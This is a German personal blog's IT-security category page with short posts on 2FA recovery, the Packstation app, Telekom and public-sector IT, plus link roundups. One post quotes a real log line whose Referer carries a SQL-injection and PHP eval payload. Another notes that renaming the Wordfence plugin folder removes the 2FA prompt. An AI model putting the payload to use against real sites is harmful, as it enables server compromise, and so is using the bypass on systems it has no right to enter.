Froschs Blog: » IT-Sicherheit

Verschusselter 2FA-Code

Mittwoch, 9. August 2023

Jetzt war ich doch grad ein wenig erschrocken. Ich hatte vor einiger Zeit im Plugin Wordfence 2FA für dieses Blog aktiviert, und damit ich einen Code bekomme, wenn ich ihn brauche, mir eine entsprechende App auf das Smartphone installiert, nämlich SecScan. Das ganze dann noch aufeinander eingestellt, und dann tat das. Erstmal.

Heute nicht mehr. Ich hatte mich wohl länger als 30 Tage nicht mehr eingeloggt, und Wordfence wollte seinen Code für 2FA wissen. SecScan hatte ihn aber einfach nicht mehr, und ich hatte es offenbar verbaselt, mir den Backup-Code irgendwo abzuspeichern. Also mußte ich Wordfence dazu überreden, mich trotzdem ins Blog zu lassen, um das ganze wieder neu einzurichten. Das nennt man wohl ein Henne-Ei-Problem.

Zum Glück gibt es einen Hintereingang: Man gehe über die Shell ins Blogverzeichnis, benenne das Plugin-Verzeichnis von Wordfence um und schwupps, ist die 2FA-Abfrage weg. Nach dem nun erfolgreichen Login benannte ich das Verzeichnis sofort wieder zurück und richtete 2FA neu ein. Und natürlich habe ich mir diesmal direkt die Backup-Codes lokal abgespeichert. Auf einem voll verschlüsselten Datenträger. Und nachher wandert der dann noch direkt ins Backup.

veröffentlicht in Computer | Keine Kommentare »

DHL-Packstation: Bald bequem unsicher

Donnerstag, 16. September 2021

Gerade erfahren: Pakete an der Packstation mit der Post & DHL App abholen.

Kurz: Die App soll auf Abruf einen 120 Sekunden gültigen QR-Code ausspucken, mit dem man das Paket aus der Station holen kann. Die Kundenkarte wird dann nicht mehr benötigt.

Etwas länger: Leute, das könnte in die Hose gehen … (mehr …)

veröffentlicht in Datenschutz, Post | 1 Kommentar »

Angriffsversuch per Referer

Sonntag, 2. Mai 2021

Eben in einer Meldung von fail2ban gesehen:

114.219.10.161 - - [02/May/2021:08:02:47 +0200] "POST /user.php HTTP/1.1" 404 47 "45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:\x22num\x22;s:191:\x22*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7B24617364275D3B6576616C2F2A2A2F286261736536345F6465636F646528275A585A686243676B583142505531526259575274615735644B54733D2729293B2F2F7D787878,0--\x22;s:2:\x22id\x22;s:9:\x22' union/*\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

Ohne Recherche: Das sieht erstmal … seltsam aus. Vermutlich müßte man die Hex-Zahlenreihen aufdröseln, um zu erfahren, was er wirklich wollte. Die lesbaren Strings „select“ und „union“ deuten aber auf einen SQL-Angriff hin. Nur: Warum steht der im Referer? Was würde denn darauf anspringen? (mehr …)

veröffentlicht in Datenschutz, Internet, Spam | 1 Kommentar »

Die Telekom und die IT-Sicherheit

Samstag, 2. November 2019

Eigentlich wollte ich nur mal eben mein älteres Smartphone bzw. die darin befindliche SIM auf der Website der Telekom registrieren in der Hoffnung, dort vielleicht einstellen zu können, ob und wann meine ausgehende Nummer beim Empfänger eines Anrufs angezeigt werden soll. Derzeit wird sie nämlich nicht angezeigt, weil ich das vor vielen Jahren in einem Telekom-Laden in Mannheim mal so angegeben hatte. Am Gerät selbst kann ich das nicht einstellen, warum auch immer.

Also ging ich auf die Website und wollte mich registrieren. Als erstes sollte ich bei der Anrede zwingend zwischen „Frau“ und „Herr“ wählen. Fuck you, Telekom, nonbinary Menschen existieren. Dann kam die Wahl eines Paßworts, und ich fühlte mich ins Jahr 1998 oder so zurückversetzt: (mehr …)

veröffentlicht in Datenschutz | 8 Kommentare »

Öffentlicher Dienst und IT

Dienstag, 29. Oktober 2019

Ich hab jetzt länger nix von mir hören, also, ähm, lesen lassen, weil's mir echt nicht gut ging. Aber grad hab ich was gelesen, da muß ich doch mal ein bißchen was drüber loswerden. Und zwar schreibt der Tagesspiegel: Experten warnten schon 2017: IT-Katastrophe am Berliner Kammergericht kam mit Ansage. Aua. Aua. AUA! Auhauerha!

Also erstmal: Die Software war gnadenlos veraltet. Ich meine, Windows 95!? Echt jetzt?

Mir scheint es außerdem, daß es (was mich aus meiner eigenen Erfahrung im öffentlichen Dienst jetzt so gar nicht wundern würde) keinerlei Schulungen des Personals zum Thema Datenschutz gab. Bei einem Gericht müßte da eigentlich jede Person, vom Richter bis zur Tippse, immer auf dem aktuellen Stand sein. Auch was IT-Sicherheit angeht, von Paßwörtern bis zum Transport von Daten; gerade, wenn auch zu Hause gearbeitet wird. (mehr …)

veröffentlicht in Computer, Datenschutz, Justiz | 1 Kommentar »

Im Netz aufgefischt #400 – zum letzten Mal

Sonntag, 20. Januar 2019

Das Interesse an dieser Rubrik hält sich wohl doch in Grenzen, deshalb ist jetzt nach Nr. 400 erstmal Schluß. Das heißt nicht, daß ich da gar nichts mehr mache. Aber nicht mehr im Blog, und nicht mehr rein manuell. Ich habe schon länger Ideen zu einem Nachrichten-Sammel- und -Recherche-Tool als Webanwendung, und daher werde ich weiterhin sammeln, nur eben erstmal nicht mehr öffentlich und in einem anderen Format, das ich später besser in eine Datenbank einlesen kann. Falls jemand weitere Ideen hat oder sogar mitprogrammieren möchte: Python3 ist „meine“ Sprache; auf Dauer muß vermutlich hier und da auch ein wenig JavaScript reingeklebt werden, das ich gar nicht beherrsche, nicht mal ansatzweise.

Und gelegentlich fliegen dann auch sämtliche Artikel dieser Rubrik aus dem Blog: Sie werden außer von Spambots später kaum noch besucht, stören bei der Suche nach regulären Blogartikeln und blasen die Schlagwörter unnötig auf. Und wenn ich einen bestimmten darin verlinkten Artikel später suche, finde ich ihn ja doch nicht. Dafür wird das oben erwähnte Tool, das mit Verschlagwortung und (wenn das so klappt, wie ich mir das denke) Volltext-Suche arbeiten kann, wesentlich geeigneter sein.

So, letzte Runde, nochmal ziemlich viel: (mehr …)

veröffentlicht in Links | Keine Kommentare »

Im Netz aufgefischt #399

Sonntag, 13. Januar 2019

Autismus

03.01.2019 TAZ: Keine Ausnahme für Autisten: Chat statt Verhandlung unzulässig (via @raulde)
09.01.2019 Denkmomente: Autismus und Fehlhörigkeit (auditive Wahrnehmungsstörung (AWS) ) (via @yousitonmyspot)
10.01.2019 Autisten bloggen: Auditive Wahrnehmungsstörung
11.01.2019 @theRosenblatts auf Twitter: Was passiert, wenn der neue Lehrer nicht das gleiche Autismus-Briefing kriegt, wie die anderen Lehrer? (darüber, Probleme immer und immer wieder erklären zu müssen)

(mehr …)

veröffentlicht in Links | Keine Kommentare »

Im Netz aufgefischt #398

Sonntag, 6. Januar 2019

Autismus

03.01.2019 Bundesverfassungsgericht: Keine Verpflichtung aus Art. 3 Abs. 3 Satz 2 GG, die mündliche Verhandlung nach den Vorstellungen eines Verfahrensbeteiligten auszugestalten (via @AlexSchestag) – Skandalträchtige Entscheidung des BVerfG zur Barrierefreiheit für einen Autisten. Schon die Formulierung „nach seinen Vorstellungen“ ist ekelhaft, es muß „nach seinen Bedürfnissen“ heißen. Die UNBRK ist dem BVerfG offensichtlich nicht geläufig. Das läßt für die Zukunft Schlimmes erahnen.
03.01.2019 Heise Newsticker: Autist darf Gerichtsprozess nicht daheim via Internet-Chat führen (via @heiseonline)